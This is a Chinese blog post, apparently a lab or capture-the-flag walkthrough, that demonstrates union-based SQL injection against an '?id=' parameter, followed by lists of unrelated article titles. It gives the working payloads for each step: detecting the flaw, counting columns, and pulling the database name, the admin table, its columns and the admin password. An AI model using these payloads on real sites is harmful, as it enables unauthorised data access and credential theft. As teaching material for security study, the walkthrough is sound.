第一步：先查看是否存在注入点：构造？id=1 and 1=1

回车后发现页面正常

构造?id=1 and 1=2

发现页面异常，得出结论：存在注入点

第二步：判断字段数

当输入order by 1和order by 2时页面都显示正常

当输入order by 3时，页面发生了异常

说明字段数为2

第三步：判断回显点

构造?id=1 and 1=2 union select 1,2   发现下面显示的是数字 “2” 说明在返显点在数字2的位置

第四步：查询相关内容

查询数据库名：and 1=2 union select 1,database()  ,得到结果为mashe

查询表名：and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1

得到结果：admin

查询字段名：（在admin表中查询）and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1

第一个字段名为 id

第二个字段为username

第三个字段名为password

继续查询字段内容

查询用户名

这里查询第二排 limit 1,1发现没有正经用户，所以只有admin一个用户

查询admin用户的密码： and 1=2 union select 1,password from admin

得到最终结果 hellohack

最新文章

1. 聊聊ASP.NET Core默认提供的这个跨平台的服务器——KestrelServer
2. Oracle Database 11g Express Editon介绍及安装
3. CSS white-space 属性
4. Sql 获取向上取整、向下取整、四舍五入取整的实例
5. 关于session和token
6. STM32 DMA USART ADC
7. Python数据类型（3）
8. LDR 和 ADR 彻底详解
9. css动画之波纹
10. linux在安装jdk时报错
11. USACO CHAPTER 1 1.1 Ride 水题
12. android117 下拉列表
13. Windows 7 Shortcuts (完整兼具分类有序，想我所想，赞！)
14. Codeforces Round #315 (Div. 2)
15. 百度前端面试题－类似slack的在线聊天室
16. Linux架构浅谈
17. TCP传输
18. 2018-12-03 VS Code英汉词典插件v0.0.7-尝试词性搭配
19. unbuntu 安装python包提示E: Unable to locate package python-timeout
20. 【转】Flash：同志们，这些知识点你们知道多少？（一些必备的Flash开发知识点）

热门文章

1. Typescript, ES6
2. struts2 中 form-action action-form 的传参方式
3. tornado中通用模版
4. eval(input())
5. PolarDB PostgreSQL logindex 设计
6. CF932G-Palindrome Partition【PAM】
7. ❤️Python接口自动化，一文告诉你连接各大【数据库】建议收藏❤️
8. 从产业链、架构和技术三个层面，看元宇宙与RPA的发展关系
9. 记typora美化----让文章更加优美
10. mysql面试题及答案,mysql最新面试题,mysql面试题大全汇总